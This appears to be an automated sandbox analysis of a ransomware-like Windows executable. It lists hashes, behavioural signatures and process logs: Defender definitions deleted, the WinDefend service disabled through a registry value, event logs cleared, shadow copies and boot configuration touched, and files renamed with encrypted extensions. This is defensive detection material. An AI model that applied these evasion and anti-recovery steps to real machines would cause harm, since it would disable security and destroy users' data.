Resubmissions
12-01-2022 20:48
220112-zlnz9adhf2 1012-01-2022 19:37
220112-yb5pksdgc6 1012-01-2022 19:25
220112-x5evksdgdl 1012-01-2022 16:50
220112-vb8jpadcc4 10Analysis
-
max time kernel
26s -
max time network
145s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 19:37
Static task
static1
Behavioral task
behavioral1
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win10-en-20211208
General
-
Target
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
-
Size
2.6MB
-
MD5
47f540350b1d360403225d146cc7fbb8
-
SHA1
43ad25b99cb47c7367b1703315402bb9e4970590
-
SHA256
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
-
SHA512
91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3644 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2248 bcdedit.exe 1080 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exedescription ioc process File opened for modification C:\Program Files\7-Zip\Lang\ky.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_8BfjuIeDRIM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_dkVYS9_KMCA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7__oFbDF3XyZw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_A5EGiS2tC940.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_FzJjBKuopg40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_30ceRJMoijw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_JgW_xHBOkGM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-util.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_iqs8D6dvnc80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_xHb1kck9lIw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_SYRggr8JJrM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_qG_qO_C8wLw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_Sb24pbLNH4U0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_DI7xeyS8Jjo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3102-0000-1000-0000000FF1CE.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_0hMpgjzGbEU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msadcor.dll.mui.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_bwogpD0PmH40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_EIG9MREoKTs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_hKb5Asdd1vo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_yUq1XnwldnQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_qK3VDmEJdnQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial2-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_k4yO1VvabCY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Trial-pl.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_PgLFUC71cQo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_VSzq1QgeWFM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_NGMvc2Dt2AE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_ADSe7x5yfZw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_TzH7ZQpPfPA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-output2.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_VC5x9azYc0k0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_yUq8FsHtjck0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-pl.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_Bk7Zhn4Qdgo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_EeoGfn_NIn80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\uk-UA\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_N65MyZUaa7I0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_mpxQm5ESzF40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_6Nks-5SzjMk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7__V0eZ7Vi3iw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Constantia-Franklin Gothic Book.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_moD04FwYSx00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_KMS_Client_AE-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_H9lOLKRWYrc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_nePf06tLVfQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_fYnAp_8ROHk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_z-amd7gGp7Y0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_q8AseZwSqjw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_FOCOvny-L9w0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_QxG1P9jnBzs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_ipvKYzSPHPA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_57SM-tzCsMY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_g6LEtz05qPg0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\HandPrints.jpg cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_vHAeCthxurE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_WDTSMnulozM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\tzdb.dat.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_LmWVEfM6P140.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_xh0OHBF6ROk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_zLHTcggz-eM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_AMH6HGMWHws0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_YUaD1--wfuA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_7Lx0op3dTuE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_U2A80e095r40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_chtD4BzaTAQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_dSJjhjg4dIU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fontconfig.properties.src.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_GNfY_Q3ZdOg0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_iwIzs0MgFo40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_J8fPu0WWTQM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_zfZ7x_avG7k0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\IpsMigrationPlugin.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1300 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.execce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exepid process 1696 powershell.exe 1696 powershell.exe 1696 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2192 wevtutil.exe Token: SeBackupPrivilege 2192 wevtutil.exe Token: SeSecurityPrivilege 3232 wevtutil.exe Token: SeBackupPrivilege 3232 wevtutil.exe Token: SeSecurityPrivilege 3152 wevtutil.exe Token: SeBackupPrivilege 3152 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1288 wmic.exe Token: SeSecurityPrivilege 1288 wmic.exe Token: SeTakeOwnershipPrivilege 1288 wmic.exe Token: SeLoadDriverPrivilege 1288 wmic.exe Token: SeSystemProfilePrivilege 1288 wmic.exe Token: SeSystemtimePrivilege 1288 wmic.exe Token: SeProfSingleProcessPrivilege 1288 wmic.exe Token: SeIncBasePriorityPrivilege 1288 wmic.exe Token: SeCreatePagefilePrivilege 1288 wmic.exe Token: SeBackupPrivilege 1288 wmic.exe Token: SeRestorePrivilege 1288 wmic.exe Token: SeShutdownPrivilege 1288 wmic.exe Token: SeDebugPrivilege 1288 wmic.exe Token: SeSystemEnvironmentPrivilege 1288 wmic.exe Token: SeRemoteShutdownPrivilege 1288 wmic.exe Token: SeUndockPrivilege 1288 wmic.exe Token: SeManageVolumePrivilege 1288 wmic.exe Token: 33 1288 wmic.exe Token: 34 1288 wmic.exe Token: 35 1288 wmic.exe Token: 36 1288 wmic.exe Token: SeIncreaseQuotaPrivilege 2344 wmic.exe Token: SeSecurityPrivilege 2344 wmic.exe Token: SeTakeOwnershipPrivilege 2344 wmic.exe Token: SeLoadDriverPrivilege 2344 wmic.exe Token: SeSystemProfilePrivilege 2344 wmic.exe Token: SeSystemtimePrivilege 2344 wmic.exe Token: SeProfSingleProcessPrivilege 2344 wmic.exe Token: SeIncBasePriorityPrivilege 2344 wmic.exe Token: SeCreatePagefilePrivilege 2344 wmic.exe Token: SeBackupPrivilege 2344 wmic.exe Token: SeRestorePrivilege 2344 wmic.exe Token: SeShutdownPrivilege 2344 wmic.exe Token: SeDebugPrivilege 2344 wmic.exe Token: SeSystemEnvironmentPrivilege 2344 wmic.exe Token: SeRemoteShutdownPrivilege 2344 wmic.exe Token: SeUndockPrivilege 2344 wmic.exe Token: SeManageVolumePrivilege 2344 wmic.exe Token: 33 2344 wmic.exe Token: 34 2344 wmic.exe Token: 35 2344 wmic.exe Token: 36 2344 wmic.exe Token: SeIncreaseQuotaPrivilege 2344 wmic.exe Token: SeSecurityPrivilege 2344 wmic.exe Token: SeTakeOwnershipPrivilege 2344 wmic.exe Token: SeLoadDriverPrivilege 2344 wmic.exe Token: SeSystemProfilePrivilege 2344 wmic.exe Token: SeSystemtimePrivilege 2344 wmic.exe Token: SeProfSingleProcessPrivilege 2344 wmic.exe Token: SeIncBasePriorityPrivilege 2344 wmic.exe Token: SeCreatePagefilePrivilege 2344 wmic.exe Token: SeBackupPrivilege 2344 wmic.exe Token: SeRestorePrivilege 2344 wmic.exe Token: SeShutdownPrivilege 2344 wmic.exe Token: SeDebugPrivilege 2344 wmic.exe Token: SeSystemEnvironmentPrivilege 2344 wmic.exe Token: SeRemoteShutdownPrivilege 2344 wmic.exe Token: SeUndockPrivilege 2344 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2744 wrote to memory of 3140 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 3140 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3140 wrote to memory of 3340 3140 net.exe net1.exe PID 3140 wrote to memory of 3340 3140 net.exe net1.exe PID 2744 wrote to memory of 3084 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 3084 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3084 wrote to memory of 980 3084 net.exe net1.exe PID 3084 wrote to memory of 980 3084 net.exe net1.exe PID 2744 wrote to memory of 300 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 300 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 300 wrote to memory of 2232 300 net.exe net1.exe PID 300 wrote to memory of 2232 300 net.exe net1.exe PID 2744 wrote to memory of 2948 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 2948 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2948 wrote to memory of 668 2948 net.exe net1.exe PID 2948 wrote to memory of 668 2948 net.exe net1.exe PID 2744 wrote to memory of 3732 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 3732 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3732 wrote to memory of 3820 3732 net.exe net1.exe PID 3732 wrote to memory of 3820 3732 net.exe net1.exe PID 2744 wrote to memory of 3552 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 3552 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3552 wrote to memory of 812 3552 net.exe net1.exe PID 3552 wrote to memory of 812 3552 net.exe net1.exe PID 2744 wrote to memory of 2896 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 2896 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2896 wrote to memory of 1504 2896 net.exe net1.exe PID 2896 wrote to memory of 1504 2896 net.exe net1.exe PID 2744 wrote to memory of 1088 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 1088 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1088 wrote to memory of 368 1088 net.exe net1.exe PID 1088 wrote to memory of 368 1088 net.exe net1.exe PID 2744 wrote to memory of 660 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2744 wrote to memory of 660 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 660 wrote to memory of 1228 660 net.exe net1.exe PID 660 wrote to memory of 1228 660 net.exe net1.exe PID 2744 wrote to memory of 3664 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 3664 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1260 2744 